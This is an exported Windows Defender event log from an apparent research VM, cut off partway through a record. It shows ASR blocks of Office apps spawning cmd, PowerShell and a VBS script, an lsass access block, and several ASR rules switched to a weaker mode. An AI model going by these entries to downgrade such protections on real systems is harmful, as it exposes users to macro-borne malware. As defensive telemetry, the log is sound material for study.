User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1815 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x2 11/16/2023 04:22:28 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1814 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x2 11/16/2023 04:22:28 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1813 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x2 11/16/2023 04:22:28 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1812 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x2 11/16/2023 03:51:28 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=1811 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. ID: 3B576869-A4EC-4529-8536-B80A7769E899 Detection time: 2023-11-16T15:51:28.553Z User: researchvmhaa\research Path: C:\Users\research\AppData\Local\Temp\script.vbs Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE Target Commandline: Parent Commandline: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" Involved File: Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.696.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009 11/16/2023 03:49:14 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=1810 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A Detection time: 2023-11-16T15:49:14.419Z User: researchvmhaa\research Path: C:\Windows\System32\cmd.exe Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE Target Commandline: cmd.exe Parent Commandline: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" Involved File: Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.696.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009 11/16/2023 03:48:55 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=1809 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A Detection time: 2023-11-16T15:48:55.840Z User: researchvmhaa\research Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE Target Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Parent Commandline: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" Involved File: Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.696.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009 11/16/2023 03:48:43 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=1808 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A Detection time: 2023-11-16T15:48:43.137Z User: researchvmhaa\research Path: C:\Windows\System32\cmd.exe Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE Target Commandline: "C:\Windows\System32\cmd.exe" Parent Commandline: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" Involved File: Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.696.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009 11/16/2023 03:48:05 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=1807 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. ID: 26190899-1602-49E8-8B27-EB1D0A1CE869 Detection time: 2023-11-16T15:48:05.496Z User: researchvmhaa\research Path: C:\Windows\System32\cmd.exe Process Name: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE Target Commandline: "C:\Windows\System32\cmd.exe" Parent Commandline: "C:\Program Files\Microsoft Office\Root\Office16\OUTLOOK.EXE" -Embedding Involved File: Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.696.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009 11/16/2023 03:47:26 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=1806 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. ID: 26190899-1602-49E8-8B27-EB1D0A1CE869 Detection time: 2023-11-16T15:47:26.565Z User: researchvmhaa\research Path: C:\Windows\System32\calc.exe Process Name: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE Target Commandline: "C:\Windows\System32\calc.exe" Parent Commandline: "C:\Program Files\Microsoft Office\Root\Office16\OUTLOOK.EXE" -Embedding Involved File: Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.696.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009 11/16/2023 03:46:44 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=1805 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A Detection time: 2023-11-16T15:46:44.558Z User: researchvmhaa\research Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE Target Commandline: powershell.exe Parent Commandline: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" Involved File: Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.696.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009 11/16/2023 03:29:16 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=1804 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. ID: 9E6C4E1F-7D60-472F-BA1A-A39EF669E4B2 Detection time: 2023-11-16T15:29:16.906Z User: NT AUTHORITY\SYSTEM Path: C:\WindowsAzure\Packages\WaAppAgent.exe Process Name: C:\Windows\System32\lsass.exe Target Commandline: Parent Commandline: Involved File: Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.696.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009 11/16/2023 03:29:07 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1803 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\ServiceStartStates = 0x1 New value: Default\ServiceStartStates = 0x0 11/16/2023 03:29:03 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1802 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: Default\ServiceStartStates = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\ServiceStartStates = 0x1 11/16/2023 03:28:51 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1801 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: Default\IsServiceRunning = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\IsServiceRunning = 0x1 11/16/2023 02:57:57 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=1800 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A Detection time: 2023-11-16T14:57:57.040Z User: researchvmhaa\research Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE Target Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Parent Commandline: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" Involved File: Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.696.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009 11/16/2023 12:54:53 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1744 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\48 = 0x1 11/16/2023 12:44:53 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=1741 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. ID: 9E6C4E1F-7D60-472F-BA1A-A39EF669E4B2 Detection time: 2023-11-16T12:44:53.365Z User: NT AUTHORITY\SYSTEM Path: C:\WindowsAzure\Packages\WaAppAgent.exe Process Name: C:\Windows\System32\lsass.exe Target Commandline: Parent Commandline: Involved File: Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.693.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009 11/16/2023 12:44:37 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1740 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\ServiceStartStates = 0x1 New value: Default\ServiceStartStates = 0x0 11/16/2023 12:44:33 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1739 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: Default\ServiceStartStates = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\ServiceStartStates = 0x1 11/16/2023 12:44:22 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1738 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: Default\IsServiceRunning = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\IsServiceRunning = 0x1 11/16/2023 03:33:56 AM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1632 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\48 = 0x1 New value: 11/16/2023 01:50:39 AM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1609 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\48 = 0x1 11/15/2023 07:23:27 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1576 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: Default\ProductAppDataPath = C:\ProgramData\Microsoft\Windows Defender New value: HKLM\SOFTWARE\Microsoft\Windows Defender\ProductAppDataPath = C:\ProgramData\Microsoft\Windows Defender 11/15/2023 01:50:39 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1492 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\48 = 0x1 New value: 11/15/2023 09:50:24 AM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1474 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: Default\Signature Updates\ISUControlFlags = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates\ISUControlFlags = 0x1 11/15/2023 09:50:24 AM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1473 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: Default\Signature Updates\ISUInterval = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates\ISUInterval = 0x4 11/15/2023 09:50:24 AM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1472 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: Default\Signature Updates\ISUReason = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates\ISUReason = 0x10 11/15/2023 09:50:24 AM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1471 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: Default\Signature Updates\ISULength = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates\ISULength = 0x18 11/15/2023 09:49:29 AM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1321 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\48 = 0x1 11/15/2023 03:24:34 AM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=1306 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. ID: 9E6C4E1F-7D60-472F-BA1A-A39EF669E4B2 Detection time: 2023-11-15T03:24:34.279Z User: NT AUTHORITY\SYSTEM Path: C:\WindowsAzure\Packages\WaAppAgent.exe Process Name: C:\Windows\System32\lsass.exe Target Commandline: Parent Commandline: Involved File: Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.622.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009 11/15/2023 03:23:41 AM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1305 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\ServiceStartStates = 0x1 New value: Default\ServiceStartStates = 0x0 11/15/2023 03:23:33 AM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1304 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: Default\ServiceStartStates = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\ServiceStartStates = 0x1 11/15/2023 03:23:23 AM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1303 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: Default\IsServiceRunning = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\IsServiceRunning = 0x1 11/14/2023 11:12:42 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=1294 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. ID: 9E6C4E1F-7D60-472F-BA1A-A39EF669E4B2 Detection time: 2023-11-14T23:12:42.900Z User: NT AUTHORITY\SYSTEM Path: C:\WindowsAzure\Packages\WaAppAgent.exe Process Name: C:\Windows\System32\lsass.exe Target Commandline: C:\WindowsAzure\Packages\WaAppAgent.exe Parent Commandline: Involved File: Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.622.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009 11/14/2023 10:52:44 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=598 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: Default\Diagnostics\LastSignatureUpdateResult = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Diagnostics\LastSignatureUpdateResult = 0x0 11/14/2023 10:52:44 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=597 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: Default\CoreService\MemorySensor\LowThresholds = 2| New value: HKLM\SOFTWARE\Microsoft\Windows Defender\CoreService\MemorySensor\LowThresholds = 4|1024|128 11/14/2023 10:52:44 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=596 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: Default\CoreService\MemorySensor\MonitoredTargets = msmpeng| New value: HKLM\SOFTWARE\Microsoft\Windows Defender\CoreService\MemorySensor\MonitoredTargets = mpdefendercoreservice|msmpeng|nissrv 11/14/2023 10:52:44 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=595 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: Default\CoreService\MemorySensor\HighThresholds = 1024| New value: HKLM\SOFTWARE\Microsoft\Windows Defender\CoreService\MemorySensor\HighThresholds = 16|2048|1024 11/14/2023 10:52:44 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=594 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: Default\CoreService\DiskSensor\MonitoredTargets = msmpeng| New value: HKLM\SOFTWARE\Microsoft\Windows Defender\CoreService\DiskSensor\MonitoredTargets = 11/14/2023 10:52:44 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=593 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: Default\CoreService\CrashSensor\MonitoredTargets = msmpeng| New value: HKLM\SOFTWARE\Microsoft\Windows Defender\CoreService\CrashSensor\MonitoredTargets = mpdefendercoreservice|msmpeng|nissrv 11/14/2023 10:52:44 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=592 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: Default\CoreService\CpuSensor\LowThresholds = 5| New value: HKLM\SOFTWARE\Microsoft\Windows Defender\CoreService\CpuSensor\LowThresholds = 10|10|10 11/14/2023 10:52:44 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=591 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: Default\CoreService\CpuSensor\MonitoredTargets = msmpeng| New value: HKLM\SOFTWARE\Microsoft\Windows Defender\CoreService\CpuSensor\MonitoredTargets = mpdefendercoreservice|msmpeng|nissrv 11/14/2023 10:52:44 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=590 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: Default\CoreService\CpuSensor\HighThresholds = 95| New value: HKLM\SOFTWARE\Microsoft\Windows Defender\CoreService\CpuSensor\HighThresholds = 95|95|95 11/14/2023 10:52:44 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=589 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: Default\CoreService\WdTimerMonitorInterval = 0x1388 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\CoreService\WdTimerMonitorInterval = 0x493E0 11/14/2023 10:52:44 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 